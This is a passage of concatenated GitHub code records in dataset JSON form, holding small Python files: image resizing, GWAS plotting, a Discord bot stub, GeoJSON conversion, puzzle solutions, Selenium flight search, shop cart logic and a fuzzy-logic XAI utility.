# percent of original size\nwidth = int(img.shape[1] * scale_percent / 100)\nheight = int(img.shape[0] * scale_percent / 100)\ndim = (width, height)\nA = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\nprint('Resized Dimensions : ',A.shape)\n \ncv2.imshow(\"Resized image\", A)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"supert1123/Profile","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16681863940","text":"import pandas as pd\ndf = pd.read_csv('gwass.csv')\nprint(df)\nimport matplotlib.pyplot as plt\nimport geneview as gv\nax = gv.manhattanplot(data=df)\nplt.show()\nax = gv.manhattanplot(data=df, xticklabel_kws={\"rotation\": \"vertical\"})\nplt.show()\nax = gv.manhattanplot(data=df,\n suggestiveline=None, # Turn off suggestiveline\n genomewideline=None, # Turn off genomewideline\n xticklabel_kws={\"rotation\": \"vertical\"})\nplt.show()\n# plot only results of chromosome 8.\ngv.manhattanplot(data=df, CHR=\"chr8\", xlabel=\"Chromosome 8\")\nplt.show()\nax = gv.manhattanplot(data=df,\n sign_marker_p=1e-6, # highline the significant SNP with ``sign_marker_color`` color.\n is_annotate_topsnp=True, # annotate the top SNP\n xticklabel_kws={\"rotation\": \"vertical\"})\nplt.show()\nimport matplotlib.pyplot as plt\nimport geneview as gv\n# common parameters for plotting\nplt_params = {\n \"font.sans-serif\": \"Arial\",\n \"legend.fontsize\": 14,\n \"axes.titlesize\": 18,\n \"axes.labelsize\": 16,\n \"xtick.labelsize\": 14,\n \"ytick.labelsize\": 
14\n}\nplt.rcParams.update(plt_params)\n# Create a manhattan plot\nf, ax = plt.subplots(figsize=(12, 4), facecolor=\"w\", edgecolor=\"k\")\nxtick = set([\"chr\" + i for i in list(map(str, range(1, 10))) + [\"11\", \"13\", \"15\", \"18\", \"21\", \"X\"]])\n_ = gv.manhattanplot(data=df,\n marker=\".\",\n sign_marker_p=1e-6, # Genome wide significant p-value\n sign_marker_color=\"r\",\n snp=\"ID\", # The column name of annotation information for top SNPs.\n\n title=\"Test\",\n xtick_label_set=xtick,\n\n xlabel=\"Chromosome\",\n ylabel=r\"$-log_{10}{(P)}$\",\n\n sign_line_cols=[\"#D62728\", \"#2CA02C\"],\n hline_kws={\"linestyle\": \"--\", \"lw\": 1.3},\n\n is_annotate_topsnp=True,\n ld_block_size=50000, # 50000 bp\n text_kws={\"fontsize\": 12,\n \"arrowprops\": dict(arrowstyle=\"-\", color=\"k\", alpha=0.6)},\n ax=ax)\nplt.show()\nax = gv.qqplot(data=df[\"P\"])\nplt.show()\n#Show a better QQ plot\nf, ax = plt.subplots(figsize=(6, 6), facecolor=\"w\", edgecolor=\"k\")\n_ = gv.qqplot(data=df[\"P\"],\n marker=\"o\",\n title=\"Test\",\n xlabel=r\"Expected $-log_{10}{(P)}$\",\n ylabel=r\"Observed $-log_{10}{(P)}$\",\n ax=ax)\nplt.show()\n#Admixture plot\nimport matplotlib.pyplot as plt\nfrom geneview.utils import load_dataset\nfrom geneview import admixtureplot\nf, ax = plt.subplots(1, 1, figsize=(14, 2), facecolor=\"w\", constrained_layout=True, dpi=300)\nadmixtureplot(data=load_dataset(\"admixture_output.Q\"),\n population_info=load_dataset(\"admixture_population.info\"),\n ylabel_kws={\"rotation\": 45, \"ha\": \"right\"},\n ax=ax)\nplt.show()\n","repo_name":"Aria-Dolatabadian/GWAS","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37445648589","text":"#!/usr/bin/python3\n\n# The Las Pegasus Radio (https://github.com/tlpr)\n# This code is licensed under the GNU GPL-3.0-only license\n# https://www.gnu.org/licenses/gpl-3.0.html\n\nimport discord, asyncio, configparser\nfrom datetime import datetime\n\nclass miami_disco (discord.Client):\n\t\n\tdef console_out_debug(self, message, highlight=False):\n\t\tprefix = \"\\033[33m\\033[1m[Discord]\\033[0m \"\n\t\tif (highlight):\n\t\t\tprint(\"\\n\" + prefix + message, end=\"\\n\\n\")\n\t\telse:\n\t\t\tprint(prefix + message)\n\t\n\tdef reload_configuration_ini(self):\n\t\tconfig_parser = configparser.ConfigParser()\n\t\tconfig_parser.read(\"configuration.ini\")\n\t\tself.configini = config_parser\n\t\n\tdef start_disco(self):\n\t\ttry:\n\t\t\tself.run(self.configini[\"BOT\"][\"DITOKEN\"])\n\t\texcept discord.errors.LoginFailure:\n\t\t\tself.console_out_debug(\"Incorrect DITOKEN.\", True)\n\t\n\tasync def on_ready(self):\n\t\tself.console_out_debug(\"Logged in.\")\n\n\tasync def on_message(self, message, edited=False):\n\t\tpass\n\n\tasync def on_message_edit(self, old_message, new_message):\n\t\tif old_message.pinned: return # ignore pinned messages\n\t\tif (datetime.timestamp(old_message.created_at) + 3600) < datetime.timestamp(new_message.edited_at):\n\t\t\treturn # do not send edited message if the original message\n\t\t\t # is older than a hour.\n\t\tawait self.on_message(new_message, edited=True)\n\n","repo_name":"tlpr/miami","sub_path":"src/disco.py","file_name":"disco.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"2762652683","text":"#!/usr/bin/env python3\n\n# DSNY_Frequencies.csv comes from 
https://data.cityofnewyork.us/City-Government/DSNY-Frequencies/rv63-53db/\n\nimport csv, json, sys\ncsv.field_size_limit(sys.maxsize)\n\ndata = {\n    \"type\": \"FeatureCollection\", \n    \"crs\": {\n        \"type\": \"name\", \n        \"properties\": {\n            \"name\": \"urn: ogc:def:crs:OGC:1.3:CRS84\"\n        }\n    }, \n    \"features\": []\n}\n\nwith open('./DSNY_Frequencies.csv', 'r') as csvfile:\n    for row in [dict(row) for row in csv.DictReader(csvfile)]:\n        # round to 5 decimals, error is about 3ft -- https://en.wikipedia.org/wiki/Decimal_degrees\n        # remove '\"MULTIPOLYGON (((' clutter from source csv to be just coordinates\n        tmp_a = [e.lstrip().split(' ') for e in row[\"multipolygon\"].split('(')[3].split(')')[0].split(',')]\n        # convert to floats to trim to 5 decimals, then stringify\n        tmp_b = [json.dumps([float('%.5f'%float(y[0])), float('%.5f'%float(y[1]))]) for y in tmp_a ]\n        # remove duplicates while preserving order,\n        tmp_set = set()\n        tmp_c = []\n        for x in tmp_b:\n            if x not in tmp_set:\n                tmp_set.add(x)\n                tmp_c.append(x)\n\n        # convert json arrays back to lists of floats\n        tmp_d = [json.loads(x) for x in tmp_c] \n\n        data['features'].append({\n            \"type\": \"Feature\",\n            \"properties\": {\n                \"bulk\": row[\"FREQ_BULK\"].split(\", \"), \n                \"recycling\": row[\"FREQ_RECYCLING\"].split(\", \"), \n                \"refuse\": row[\"FREQ_REFUSE\"].split(\", \"), \n            },\n            \"geometry\": {\n                \"type\": \"Polygon\",\n                \"coordinates\": [tmp_d]\n            }\n        })\n\nwith open('data.json', 'w') as f:\n    json.dump(data, f)\n","repo_name":"mai-gh/dsny-freq-map","sub_path":"gen_json.py","file_name":"gen_json.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"26681656489","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom functools import reduce\nfrom typing import List, Tuple, Generator\n\n\ndef main(lines: List[str]):\n    cols: int = len(lines[0])\n    rows: int = len(lines)\n    energy_map: List[int] = [\n        *map(lambda s: int(s), reduce(lambda acc, curr: str(acc) + curr, lines, \"\"))]\n\n    print(\"=== [ part one ] ============================\")\n    print(\"|| how many octo flashes after 100 steps? ||\")\n\n    step = 0\n    for flashes, _ in octo_party(energy_map.copy(), rows, cols, 100):\n        step += 1\n\n    print(f\"After step {step}: {flashes} flashes\")\n\n    print()\n    print(\"=== [ part two ] ============================\")\n    print(\"|| how long until complete synchronization? ||\")\n    step = 0\n    for flashes, energy_map in octo_party(energy_map.copy(), rows, cols, 10000):\n        step += 1\n        if energy_map.count(energy_map[0]) == len(energy_map):\n            break\n\n    print(f\"1st total synchronization reached after {step} steps: {flashes} flashes\")\n\n\ndef octo_party(energy_map: List[int], rows: int, cols: int, steps: int) -> Generator[Tuple[int, List[int]], None, None]:\n    \"\"\"\n    octo_party simulates totally cute bioluminescent dumbo octopuses\n    that are arranged in a given energy_map with dimension (rows, cols)\n    for n given steps. 
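Each step, every octopus gains 1 energy; any octopus whose energy then exceeds 9\n    flashes, adds 1 energy to each of its eight neighbours (chain reactions resolve\n    within the same step) and resets to 0. For example, the 2x2 map [1, 9, 9, 1]\n    ends the first step with 2 flashes and energy levels [4, 0, 0, 4].\n    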
Acting as a generator on every step, it returns\n the current energy level of every octocutie along with the number of flashes.\n \"\"\"\n octopusses: int = len(energy_map)\n\n flashes: int = 0\n for step in range(steps):\n for octopus in range(octopusses):\n energy_map[octopus] += 1\n\n # handle flashes\n flashing: List[int] = [*filter(lambda octopus: energy_map[octopus] > 9, range(octopusses))]\n for idx in flashing:\n energy_map[idx] = 0 # reset the cutie\n flashes += 1\n\n for neighbor in get_n8_neighborhood(idx, rows, cols):\n if neighbor in flashing:\n continue\n\n energy_map[neighbor] += 1\n if energy_map[neighbor] > 9:\n flashing.append(neighbor)\n\n yield flashes, energy_map\n\n\ndef within_limit(x: int, n: int) -> int:\n return 0 if x < 0 else n - 1 if x >= n else x\n\n\ndef get_n8_neighborhood(pos: int, rows: int, cols: int) -> List[int]:\n row: int = pos // cols\n col: int = pos % cols\n\n neighbors: List[Tuple[int, int]] = [\n (within_limit(row - 1, rows), within_limit(col, cols)),\n (within_limit(row - 1, rows), within_limit(col + 1, cols)),\n (within_limit(row, rows), within_limit(col + 1, cols)),\n (within_limit(row + 1, rows), within_limit(col + 1, cols)),\n (within_limit(row + 1, rows), within_limit(col, cols)),\n (within_limit(row + 1, rows), within_limit(col - 1, cols)),\n (within_limit(row, rows), within_limit(col - 1, cols)),\n (within_limit(row - 1, rows), within_limit(col - 1, cols)),\n ]\n\n # translate back from xy to sequential number\n translated: List[int] = [*map(lambda neighbor: neighbor[0] * cols + neighbor[1], neighbors)]\n return list(set([*filter(lambda neighbor: neighbor != pos, translated)]))\n\n\nif __name__ == \"__main__\":\n path: str = sys.argv[1] if len(sys.argv) > 1 else \"\"\n if not os.path.exists(path):\n print(f\"given path {path} does not exist\")\n sys.exit(1)\n\n with open(path) as fh:\n lines: List[str] = [*map(lambda line: line.strip(),\n filter(lambda line: line != \"\", fh.readlines()))]\n if len(lines) == 0:\n print(\"no lines detected\")\n sys.exit(1)\n\n main(lines)\n","repo_name":"rathalos64/adventofcode","sub_path":"_11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35284120468","text":"# Analyses.py\n# \n# ---------------------------------------------------------------------- \n# Imports\n# ---------------------------------------------------------------------- \nimport SUAVE\nfrom SUAVE.Core import Units \nimport sys \nsys.path.append('../../XX_Supplementary/Aircraft_Models_and_Simulations') \nfrom Stopped_Rotor import base_analysis \n\n# ----------------------------------------------------------------------\n# Define the Vehicle Analyses\n# ---------------------------------------------------------------------- \ndef analyses_setup(configs): \n \n aircraft_range = 70 *Units.nmi \n N_gm_x = 10\n N_gm_y = 5 \n run_noise_model = False\n hover_noise_test = False \n \n min_x = 0\n max_x = 1\n min_y = 0\n max_y = 1\n \n analyses = SUAVE.Analyses.Analysis.Container()\n\n # build a base analysis for each config\n for tag,config in configs.items():\n analysis = base_analysis(config,N_gm_x,N_gm_y,min_y,max_y,min_x,max_x,\n aircraft_range,run_noise_model,hover_noise_test)\n analyses[tag] = analysis\n\n return analyses\n\n 
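\n# Example usage (hypothetical sketch; assumes a SUAVE configs container built\n# elsewhere, e.g. by a configs_setup() helper that this file does not define):\n#\n#     configs  = configs_setup(vehicle)\n#     analyses = analyses_setup(configs)\n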
","repo_name":"mclarke2/STANFORD_THESIS","sub_path":"07_MDA_Trade_Studies/07_Battery_Config_Optimization/SR_Battery_Optimization/Battery_Opt_Analyses.py","file_name":"Battery_Opt_Analyses.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7227791837","text":"import time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver import Keys\r\nfrom selenium.webdriver.chrome.service import Service\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.select import Select\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\n\r\ndriver = webdriver.Chrome(service=Service(ChromeDriverManager().install()))\r\n# driver = webdriver.Chrome(executable_path=ChromeDriverManager().install())\r\ndriver.get(\"https://www.yatra.com/\")\r\ndriver.maximize_window()\r\ntime.sleep(2)\r\n\r\ndepart_city = \"Dallas Fort Worth\"\r\n\r\n# city = 'Udhagamandalam'\r\n# search_field = driver.find_element(By.ID, \"input-auto-complete\")\r\n\r\ndepart = driver.find_element(By.ID, \"BE_flight_origin_city\")\r\ndepart.click()\r\ntime.sleep(2)\r\n\r\nfor x in depart_city:\r\n depart.send_keys(x)\r\ndepart.send_keys(Keys.ENTER)\r\n\r\ntime.sleep(4)\r\n\r\narrival_city = \"Dubai\"\r\narrival = driver.find_element(By.ID, \"BE_flight_arrival_city\")\r\narrival.click()\r\n\r\ntime.sleep(1)\r\n\r\nfor x in arrival_city:\r\n arrival.send_keys(x)\r\narrival.send_keys(Keys.ENTER)\r\ntime.sleep(2)\r\n\r\ndriver.find_element(By.ID, 'BE_flight_origin_date').click()\r\n\r\ntime.sleep(2)\r\n\r\n# //div[@class=\"day-container\"]//child::td\r\n\r\n# //*[@class=\"datepicker flex1 activeBox\"]//child::td\r\ndepart_date='09/02/2022'\r\ncalendar_dates = driver.find_elements(By.XPATH, '//*[@class=\"day-container\"]//child::td')\r\n#print(len(calendar_dates))\r\n\r\nfor date in calendar_dates:\r\n if(date.get_attribute(\"data-date\") == depart_date):\r\n print(\"Correct date\",\"&&&&&&\")\r\n date.click()\r\n break\r\n\r\ntime.sleep(4)\r\n\r\n\r\n\r\ndriver.find_element(By.ID,\"BE_flight_flsearch_btn\").click()\r\ntime.sleep(3)\r\n#book_now=driver.find_elements(By.XPATH,'//*[@class=\"fs-14 secondary-button button cursor-pointer bold\"]')\r\nbook_now=driver.find_elements(By.XPATH,\"//*[@class='full mb-8 fs-13 airline-name']\")\r\n\r\n\r\n\r\nprint(len(book_now))\r\nfor flight in book_now:\r\n print(flight.text)\r\ntime.sleep(4)\r\n\r\n\r\n","repo_name":"divyabaijuraj/test","sub_path":"Day2/Exercise7.py","file_name":"Exercise7.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29675405974","text":"\"\"\"\n1、MyList类\n1)初始化方法\n2)__iter__()方法,对外提供迭代器\n3)additem()方法,用来添加数据\n\n2、自定义迭代器,MyListIterator类\n1)初始化方法\n2)迭代器方法 __iter__()\n3) 获取下一个数据方法,next()\n\n目标:\nmylist = MyList()\nfor value in mylist:\n print(value)\n\n\n\n\"\"\"\n\n\n# 1、MyList类\nclass MyList(object):\n # 1)初始化方法\n def __init__(self):\n # 定义实例属性,保存数据\n self.items = []\n\n # 2)__iter__()方法,对外提供迭代器\n def __iter__(self):\n # 实例化MyListIterator()\n mylist_iterator = MyListIterator(self.items)\n # 返回迭代器\n return mylist_iterator\n\n # 3)additem()方法,用来添加数据\n def additem(self, data):\n # 追加保存内容\n self.items.append(data)\n print(self.items)\n\n\n# 2、自定义迭代器,MyListIterator类\nclass MyListIterator(object):\n # 1)初始化方法\n def __init__(self, items):\n # 定义实例属性,保存MyList()传递过来的items\n self.itmes = items\n\n # 记录迭代器迭代的位置\n self.current_index = 0\n\n # 2)迭代器方法 
__iter__()\n def __iter__(self):\n pass\n\n # 3) 获取下一个数据方法,next()\n # 当next()时候,就会自动调用 __next__()方法\n def __next__(self):\n # 1、判断当前的下标是否越界\n if self.current_index < len(self.itmes):\n # 1)根据下标获取当前下标的元素值\n data = self.itmes[self.current_index]\n # 2)下标位置+1\n self.current_index += 1\n # 3)返回下标对应的数据\n return data\n\n # 2、如果越界,直接抛出异常\n else:\n # raise 主动抛出异常\n # StopIteration 停止迭代\n raise StopIteration\n\n\nif __name__ == '__main__':\n # 创建自定义列表对象\n mylist = MyList()\n mylist.additem(\"小明\")\n mylist.additem(\"小红\")\n mylist.additem(\"猪八戒\")\n mylist.additem(\"xxxxxxxxx\")\n\n # 遍历的本质\n # 1、iter(mylist)获取mylist对象的迭代器 --> MyList() --> __iter__()\n # 2、next(迭代器)获取下一个值\n # 3、捕获异常\n # for value in mylist:\n # print(\"name: \", value)\n\n mylist_iterator = iter(mylist)\n value = next(mylist_iterator)\n print(value)\n\n value = next(mylist_iterator)\n print(value)\n\n value = next(mylist_iterator)\n print(value)\n\n value = next(mylist_iterator)\n print(value)\n\n # value = next(mylist_iterator)\n # print(value)\n","repo_name":"18025574067/python-20","sub_path":"day08/02-自定义列表.py","file_name":"02-自定义列表.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19837217861","text":"from sqlalchemy import Column, Integer, String\nfrom sqlalchemy.orm import relationship\nfrom app.src.models.BaseModel import BaseModel\n\nbase = BaseModel()\nBase = base.getDeclarative()\n\n\nclass TrainingUrlModel(Base):\n __tablename__ = \"training_url\"\n\n id = Column(\n Integer,\n primary_key=True,\n nullable=False\n )\n name = Column(\n String(1),\n nullable=False\n )\n\n url = Column(\n String(100),\n nullable=False\n )\n\n description = Column(\n String(1000),\n nullable=False\n )\n\n priority = Column(\n Integer,\n nullable=False\n )\n\n trainings = relationship(\"TrainingModel\", back_populates=\"trainingUrl\")\n","repo_name":"TheGeniesis/PAK","sub_path":"app/src/models/TrainingUrlModel.py","file_name":"TrainingUrlModel.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7718143863","text":"import json, csv\n\ndef load_samples_from_json(file_name):\n # Essa função lê os 284 \"esquemas\" ou \"amostras\" do .json e coloca em samples\n with open(file_name, 'r', encoding='utf-8') as file:\n samples = json.load(file)\n return samples\n\ndef create_json(file_name, translated_samples):\n # Essa função cria o arquivo .json traduzido pro inglês\n with open(file_name, 'w', encoding='utf-8') as output_file:\n json.dump(translated_samples, output_file, ensure_ascii=False)\n\ndef create_csv(file_name, translated_samples):\n # Essa função cria o arquivo .csv de esquemas traduzido pro inglês\n with open(file_name, 'w', encoding='utf-8', newline='') as output_file:\n writer = csv.writer(output_file, delimiter=',')\n writer.writerow(translated_samples)\n\n\nsamples = load_samples_from_json('english_wsc.json')\n\nonly_schema_samples = []\ni = 0\nfor sample in samples:\n i = i+1\n only_schema_samples.append(sample['schema'])\n\ncreate_csv('english_wsc_only_schemas.csv', only_schema_samples)\ncreate_json('english_wsc_only_schemas.json', only_schema_samples)","repo_name":"thaapontes/tcc_project","sub_path":"english_schemas.py","file_name":"english_schemas.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14987505570","text":"import 
decimal\nrepo = {100: [\"bread\", 2], 101: [\"bakery products\", 3], 102: [\"cookie\", 5], #{category: [product, price]}\n        200: [\"pork\", 9.99], 201: [\"beaf\", 15], 202: [\"chicken\", 7],\n        300: [\"hake fish\", 15], 301: [\"cod\", 25], 302: [\"shrimps\", 35]}\n\nshoping_cart_final = {}\ntotal_price = 0\n\ndef get_bakery():\n    bakery_repo = {}\n    bakery_repo.update([v for k,v in repo.items() if k in range(100,199,1)])\n    return bakery_repo.items() \n\ndef get_meat():\n    meat_repo = {}\n    meat_repo.update([v for k,v in repo.items() if k in range(200,299,1)])\n    return meat_repo.items()\n\ndef get_fish():\n    fish_repo = {}\n    fish_repo.update([v for k,v in repo.items() if k in range(300,399,1)])\n    return fish_repo.items() \n\ndef add_to_cart(product, quantity):\n    for v in repo.values():\n        if product == v[0]:\n            price = round(decimal.Decimal(quantity*v[1]),2)\n            global total_price\n            total_price = round(decimal.Decimal(total_price + price),2)\n            cost = [v[1], quantity, price]\n            shoping_cart= dict.fromkeys([v[0]], cost)\n            shoping_cart_final.update(shoping_cart)\n            return True\n    # only report failure after checking every product, not on the first mismatch\n    return False\n\ndef remove_cart(product, quantity):\n    for k, v in shoping_cart_final.items():\n        if (product == k and quantity == v[1]):\n            global total_price\n            total_price = round((total_price - decimal.Decimal(quantity*v[0])),2)\n            shoping_cart_final.pop(k)\n            return True\n        elif (product == k and quantity < v[1]):\n            price = round(decimal.Decimal(v[2]) - decimal.Decimal(quantity*v[0]),2)\n            cost = [v[0], v[1] - quantity, price]\n            total_price = round((decimal.Decimal(total_price) - decimal.Decimal(quantity*v[0])),2)\n            edit_cart= dict.fromkeys([k], cost)\n            shoping_cart_final.update(edit_cart)\n            return True\n    return False \n\ndef confirm_order():\n    global total_price\n    total_price = 0\n    shoping_cart_final.clear()\n    return \"Order accepted for work\" \n\n    \n    \n\n\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-50-22","sub_path":"Tasks/Churo/Task_6/shop_data.py","file_name":"shop_data.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"1611313857","text":"class Solution:\n    def findRepeatedDnaSequences(self, s: str) -> List[str]:\n        \n        # Linear-time Slice Using Substring + HashSet\n        # much faster lookup in a set than in a list\n        # time & space: O((N-L)*L); the loop runs N-L+1 times and each pass builds a substring of length L. 
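\n        # A true rolling hash (sketch only, not the code used below): pack A/C/G/T\n        # into 2 bits each and keep a 20-bit window, so every slide costs O(1):\n        #     code = {'A': 0, 'C': 1, 'G': 2, 'T': 3}\n        #     h, seen, ans = 0, set(), set()\n        #     for i, ch in enumerate(s):\n        #         h = ((h << 2) | code[ch]) & ((1 << 20) - 1)\n        #         if i >= 9:\n        #             if h in seen:\n        #                 ans.add(s[i - 9 : i + 1])\n        #             seen.add(h)\n        #     return list(ans)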
\n \n # rabin-karp for multiple pattern search\n # Constant-time Slice Using Rolling Hash\n l, n = 10, len(s)\n seen, ans = set(), set()\n \n for start in range(n - l + 1):\n tmp = s[start : start + l]\n if tmp in seen:\n ans.add(tmp[:])\n seen.add(tmp)\n return ans ","repo_name":"cindyyj/leetcode_solutions","sub_path":"187-repeated-dna-sequences/187-repeated-dna-sequences.py","file_name":"187-repeated-dna-sequences.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33303317449","text":"import json\nimport logging\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport skfuzzy as fuzz\nimport sys\nfrom cerberus import Validator\nfrom types import SimpleNamespace\n\nCONFIG_FILE = \"./resources/config/config.json\"\nANTE_CONFIG_FILE = \"./resources/config/antecedent_config.json\"\nCONFIG_VALIDATION = \"./../resources/validation/config_schema.json\"\n\n__config = None\n__ante_config = None\n\n\ndef get_config(config_file=CONFIG_FILE, reload=False):\n \"\"\"\n @param config_file: config file path (default: \"./resources/config/config.json\")\n @param reload: whether or not to reload config file (default: False)\n\n @returns config as namespace\n \"\"\"\n global __config\n config_file = config_file if config_file is not None else CONFIG_FILE\n if __config is None or config_file != CONFIG_FILE or reload:\n with open(config_file) as f:\n __config = json.load(f, object_hook=lambda d: SimpleNamespace(**d))\n return __config\n\n\ndef get_ante_config(config_file=ANTE_CONFIG_FILE, reload=False):\n \"\"\"\n Loads antecedent config. If no config file is available yet,\n initial config file gets recreated from python config file.\n\n @param config_file: antecedent config file path (default: \"./resources/config/antecedent_config.json\")\n @param reload: whether or not to reload config file (default: False)\n\n @returns config as namespace\n \"\"\"\n global __ante_config\n config_file = config_file if config_file is not None else ANTE_CONFIG_FILE\n if __ante_config is None or config_file != ANTE_CONFIG_FILE or reload:\n try:\n with open(config_file) as f:\n __ante_config = json.load(f)\n except FileNotFoundError:\n # if file is deleted, generate new one from convenience file (default antecedents!!)\n from resources.config.antecedent_config import antecedents as ac\n # if no json file of ante_config is available, generate from antecedent_config.py\n with open(config_file, 'w') as fp:\n json.dump(ac, fp)\n __ante_config = ac\n return __ante_config\n\n\ndef plot_membership(var_name, x, mfx, save=False):\n \"\"\"\n Plot membership function.\n Defuzzification of a membership function, returning a defuzzified value of the function at x, using various \n defuzzification methods (COG,MOM,SOM,LOM)\n\n @param var_name: Name of variable\n @param x: Independent variable (1d array or iterable, length N)\n @param mfx: Fuzzy membership function (1d array of iterable, length N)\n \n \"\"\"\n # Defuzzify this membership function five ways\n print(\"--- \", var_name, \", x: \", x, \" mfx: \", mfx)\n defuzz_centroid = fuzz.defuzz(x, mfx, 'centroid') # Same as skfuzzy.centroid\n # defuzz_bisector = fuzz.defuzz(x, mfx, 'bisector')\n defuzz_mom = fuzz.defuzz(x, mfx, 'mom')\n defuzz_som = fuzz.defuzz(x, mfx, 'som')\n defuzz_lom = fuzz.defuzz(x, mfx, 'lom')\n\n # Collect info for vertical lines\n # labels = ['centroid', 'bisector', 'mean of maximum', 'min of maximum', 'max of maximum']\n labels = 
['COG', 'Mean of Maximum', 'Min of Maximum', 'Max of Maximum']\n xvals = [defuzz_centroid,\n # defuzz_bisector,\n defuzz_mom,\n defuzz_som,\n defuzz_lom]\n colors = [\"b\", \"g\", \"r\", \"y\", \"m\"]\n ymax = [fuzz.interp_membership(x, mfx, i) for i in xvals]\n\n # Display and compare defuzzification results against membership function\n plt.figure(figsize=(8, 4))\n\n plt.plot(x, mfx, 'k')\n for xv, y, label, color in zip(xvals, ymax, labels, colors):\n plt.vlines(xv, 0, y, label=label, color=color)\n plt.ylabel('Zugehörigkeitswert')\n plt.xlabel('Diskursuniversum ({})'.format(var_name))\n #plt.ylabel('Fuzzy membership')\n #plt.xlabel('Universe variable ({})'.format(var_name))\n #plt.ylim(-0.1, 1.1)\n plt.legend(loc=2)\n\n if save:\n plt.savefig(f\"./../defuzz_{var_name}.png\",dpi=300)\n\n plt.show()\n\n\ndef get_logger(name, activate_console_logs=True, log_file=get_config().resource_files.log_file, log_level=logging.INFO):\n '''\n Returns logger which logs to console on a specified level\n\n @param activate_console_logs: If true, logs are also printed in the console. Default: True\n @param log_file: File to write logs to. Default: config.resource_files.log_file\n @param log_level: Level of which to log events\n\n @returns Logger\n '''\n logFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\n rootLogger = logging.getLogger(name)\n\n fileHandler = logging.FileHandler(log_file)\n fileHandler.setFormatter(logFormatter)\n fileHandler.setLevel(log_level)\n rootLogger.addHandler(fileHandler)\n\n if activate_console_logs:\n consoleHandler = logging.StreamHandler() # (sys.stdout)\n consoleHandler.setFormatter(logFormatter)\n consoleHandler.setLevel(log_level)\n rootLogger.addHandler(consoleHandler)\n rootLogger.setLevel(logging.DEBUG)\n\n return rootLogger\n\n\n############################ KNOWLEDGE AQUISITION ############################\n\ndef create_exclusion_criteria(name, label, help_txt, section, method_rating):\n \"\"\"\n Adds rating of criteria to dataframe and returns antecedent configuration\n to be added to ante_config\n Attention: Formulate Boolean criteria, that application of the method is\n possible when input variable >= Rating of method in dataframe\n\n @param name: name of criterion\n @param label: label of criterion\n @param help_txt: help text\n @param section: section to display criterion in\n @param method_rating: Rating for every available XAI-method (1d array, length of available methods)\n \"\"\"\n excl_criteria_df = pd.read_csv(get_config().resource_files.rating_bool, index_col=[0])\n assert len(method_rating) == len(\n excl_criteria_df.columns), f\"Length of given method ratings ({len(method_rating)}) doesn't match length of \" \\\n f\"rating dataframe ({len(excl_criteria_df.columns)})\"\n\n # add to boolean rating dataframe\n excl_criteria_df.loc[name] = method_rating\n # save dataframe back\n excl_criteria_df.to_csv(get_config().resource_files.rating_bool)\n\n return {\n \"label\": label,\n \"type\": \"exclusion_criteria\",\n \"dtypes\": {\n \"fuzzy\": \"bool\",\n \"crisp\": \"bool\"\n },\n \"frontend\": {\n \"type\": \"checkbox\",\n \"section\": section,\n \"help\": help_txt,\n \"initialValue\": True,\n \"rating\": \"bool\"\n }\n }\n\n\ndef add_method(name, label, visualization, exclusion_ratings, fuzzy_ratings):\n \"\"\"\n Add methods to backend application of XAIR\n\n @param name: name of method\n @param label: label to be displayed\n @param visualization: 1 if visualization method, 0 otherwise\n @param 
exclusion_ratings: 1d array of method rating regarding exclusion criteria (length: number of exclusion criteria)\n @param fuzzy_ratings: 1d array of method rating regarding fuzzy criteria (length: number of all possible fuzzy criteria levels)\n\n \"\"\"\n # add exclusion criteria rating\n excl_criteria_df = pd.read_csv(get_config().resource_files.rating_bool, index_col=[0])\n excl_criteria_df[label] = exclusion_ratings\n excl_criteria_df.to_csv(get_config().resource_files.rating_bool)\n\n # add fuzzy rating\n fuzzy_df = pd.read_csv(get_config().resource_files.rating_fuzzy, index_col=[0, 1])\n fuzzy_df[label] = fuzzy_ratings\n fuzzy_df.to_csv(get_config().resource_files.rating_fuzzy)\n\n # add to alternatives in config\n with open(get_config().resource_files.consequent_config) as f:\n c = json.load(f)\n c[name] = {'label': label,\n 'visualization': visualization}\n with open(get_config().resource_files.consequent_config, 'w') as fp:\n json.dump(c, fp)\n\n return True\n\n\ndef create_criteria(label,\n help_txt,\n crit_type,\n standalone_impact,\n disable_processing,\n section,\n input_type,\n rating,\n universe,\n mem_funcs,\n 